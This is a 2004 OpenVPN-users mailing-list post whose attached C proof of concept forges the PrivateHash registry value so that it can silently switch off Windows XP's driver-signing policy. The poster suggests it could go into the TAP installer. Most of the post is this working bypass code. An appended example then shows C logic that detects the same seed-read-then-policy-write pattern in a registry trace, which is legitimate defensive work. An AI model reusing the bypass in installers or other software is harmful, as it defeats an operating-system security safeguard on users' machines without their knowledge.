Re: [Openvpn-users] Re: Microsoft Logo Warning


  • Subject: Re: [Openvpn-users] Re: Microsoft Logo Warning
  • From: Stefan `Sec` Zehl <sec@xxxxxx>
  • Date: Mon, 15 Nov 2004 13:16:46 +0100
  • Accept-languages: de, en
  • I-love-doing-this: really

On Wed, Nov 10, 2004 at 01:38 -0700, Blaine Fleming wrote:
> 
> >...but then, I suppose that if you wanted to be evil, you could just
> >find the registry key that GUI setting twiddles, temporarily modify it
> >during the install process and put it back afterwards.
> 
> MS made sure it wasn't quite that easy...
> http://support.microsoft.com/?kbid=298503

I felt challenged by the wording in that KB article.

I present you with the attached Proof of concept C Code which can turn
the "Driver Signing" Setting on or off at will. The usual caveats apply
(it works on my machine: XP with SP2). Perhaps someone wants to include
it in the TAP installer :-)

CU,
    Sec
-- 
  "The General who in a hundred battles is always victorious is not as
  great as the one who achieves his objectives without fighting."
                                             -- Sun Tzu

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>
#include <stdlib.h>

#define HP_HASHVALUE HP_HASHVAL

/* This program turns the Driver signing Policy On/Off for Windows XP
 * Written by Stefan `Sec` Zehl <sec@xxxxxx>, 15.11.2004
 *
 * Thanks to sysinternals.com for regmon and apispy
 *        to msdn.microsoft.com for windows reference
 *        to cygwin for their environment
 */

void MyHandleError(char *s){
	printf("Error: %s, number %x.\n",s,(unsigned int)GetLastError());
	exit(1);
}
//--------------------------------------------------------------------
int main(void){
	HCRYPTPROV hCryptProv;
	HCRYPTHASH hHash;
	BYTE data[16];
	DWORD len;
	DWORD seed;
	HKEY hkey;
	BYTE onoff=0; // This is the On/Off toggle
	BYTE input[4]; // CryptHashData expects a BYTE buffer
	int x;

	// HKLM\System\WPA\PnP\seed
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"System\\WPA\\PnP",
			0,
			KEY_READ,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey success\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegQueryValueEx(
			hkey,
			"seed",
			NULL,
			NULL,
			(BYTE*)&seed,
			&len
			)==ERROR_SUCCESS){
		printf("RegQueryValue success\n");
	}else{
		printf("RegQueryValue failure\n");
	};

	if(hkey)
		RegCloseKey(hkey);

	printf("Seed=%x\n",(unsigned int)seed);

	printf("Hello, World\n");
	if(CryptAcquireContext(
				&hCryptProv, 
				NULL, 
				NULL, 
				PROV_RSA_FULL, 
				0)) 
	{
		printf("CryptAcquireContext complete. \n");
	} else {
		MyHandleError("Acquisition of context failed.");
	}
	//--------------------------------------------------------------------
	// Create a hash object.

	if(CryptCreateHash(
				hCryptProv, 
				CALG_MD5, 
				0, 
				0, 
				&hHash)) 
	{
		printf("An empty hash object has been created. \n");
	} else {
		MyHandleError("Error during CryptBeginHash!\n");
	}
	//--------------------------------------------------------------------
	// Compute the cryptographic hash on the data.

	input[0]=0;
	input[1]=onoff; // This is the Value!
	input[2]=0;
	input[3]=0;

	if(CryptHashData(
			hHash,
			input,
			sizeof(input),
			0))
	{
		printf("The data has been hashed. \n");
	} else {
		MyHandleError("Error during CPHashData!\n");
	}
	//--------------------------------------------------------------------

	if(CryptHashData(
			hHash,
			(BYTE*)&seed,
			sizeof(seed),
			0))
	{
		printf("The data has been hashed. \n");
	} else {
		MyHandleError("Error during CPHashData!\n");
	}
	//--------------------------------------------------------------------
	len=sizeof(data);
	if( CryptGetHashParam(
			hHash,
			HP_HASHVALUE,
			data,
			&len,
			0))
	{
		printf("The hash has been retrieved. \n");
	} else {
		MyHandleError("Error during CPGetHashParam!\n");
	}

	//--------------------------------------------------------------------
	// Clean up.

	// Destroy the hash object.

	if(hHash) {
		if(!(CryptDestroyHash(hHash)))
			MyHandleError("Error during CryptDestroyHash");
	}

	// Release the CSP.

	if(hCryptProv) {
		if(!(CryptReleaseContext(hCryptProv,0)))
			MyHandleError("Error during CryptReleaseContext");
	}

	printf("Hash: ");
	for(x=0;x<sizeof(data);x++){
		printf("%x ",data[x]);
	};
	printf("\nCreate md5 hash completed without error. \n");

	//--------------------------------------------------------------------
	// HKLM\Software\Microsoft\Windows\CurrentVersion\Setup\PrivateHash
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey success\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"PrivateHash",
			0,
			REG_BINARY,
			data,
			sizeof(data)
			)==ERROR_SUCCESS){
		printf("RegSetValueEx success\n");
	}else{
		printf("RegSetValueEx failure\n");
	};

	if(hkey)
		RegCloseKey(hkey);
	//--------------------------------------------------------------------
	// HKCU\Software\Microsoft\Driver Signing\Policy
	if(RegOpenKeyEx(
			HKEY_CURRENT_USER,
			"Software\\Microsoft\\Driver Signing",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey success\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"Policy",
			0,
			REG_BINARY,
			&onoff,
			1
			)==ERROR_SUCCESS){
		printf("RegSetValueEx success\n");
	}else{
		printf("RegSetValueEx failure\n");
	};
	if(hkey)
		RegCloseKey(hkey);

	//--------------------------------------------------------------------
	// HKLM\Software\Microsoft\Driver Signing\Policy
	if(RegOpenKeyEx(
			HKEY_LOCAL_MACHINE,
			"Software\\Microsoft\\Driver Signing",
			0,
			KEY_WRITE,
			&hkey
			)==ERROR_SUCCESS){
		printf("RegOpenKey success\n");
	}else{
		printf("RegOpenKey failure\n");
	};

	len=sizeof(seed);
	if(RegSetValueEx(
			hkey,
			"Policy",
			0,
			REG_BINARY,
			&onoff,
			1
			)==ERROR_SUCCESS){
		printf("RegSetValueEx success\n");
	}else{
		printf("RegSetValueEx failure\n");
	};
	if(hkey)
		RegCloseKey(hkey);

	exit(0);
}
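
An added example, not part of the original post or its attachment: portable C detection logic that scans a registry-activity trace for the pattern the attachment produces, one process reading the PnP seed and then writing PrivateHash or a Driver Signing Policy value. The "process|operation|path" line format, the sample trace and the process name setup-helper.exe are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Registry paths are case-insensitive, so compare that way. */
static int ieq(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Classify one "process|operation|path" line (constructed trace format).
 * Returns 0 = unrelated, 1 = read of the PnP seed,
 * 2 = write to PrivateHash or to a Driver Signing Policy value. */
int classify_event(const char *line, char proc[64]) {
    char op[32], path[256];
    if (sscanf(line, "%63[^|]|%31[^|]|%255[^\n]", proc, op, path) != 3) return 0;
    if (ieq(op, "QueryValue") && ieq(path, "HKLM\\System\\WPA\\PnP\\seed")) return 1;
    if (!ieq(op, "SetValue")) return 0;
    return (ieq(path, "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Setup\\PrivateHash") ||
            ieq(path, "HKLM\\Software\\Microsoft\\Driver Signing\\Policy") ||
            ieq(path, "HKCU\\Software\\Microsoft\\Driver Signing\\Policy")) ? 2 : 0;
}

/* Returns 1 and fills `who` when the most recent process to read the seed
 * later writes one of the watched values; 0 otherwise. */
int seed_then_write(const char *const *lines, int n, char who[64]) {
    char reader[64] = "", proc[64];
    for (int i = 0; i < n; i++) {
        int c = classify_event(lines[i], proc);
        if (c == 1) strcpy(reader, proc);
        else if (c == 2 && reader[0] && ieq(reader, proc)) { strcpy(who, proc); return 1; }
    }
    return 0;
}

/* Constructed sample trace; setup-helper.exe is a hypothetical process name. */
static const char *const SAMPLE[] = {
    "explorer.exe|QueryValue|HKCU\\Software\\Microsoft\\Driver Signing\\Policy",
    "setup-helper.exe|QueryValue|HKLM\\SYSTEM\\WPA\\PnP\\seed",
    "setup-helper.exe|SetValue|HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Setup\\PrivateHash",
    "setup-helper.exe|SetValue|HKLM\\Software\\Microsoft\\Driver Signing\\Policy",
};

int main(void) {
    char who[64];
    if (seed_then_write(SAMPLE, 4, who)) printf("ALERT: %s read seed, then wrote policy state\n", who);
    return 0;
}
```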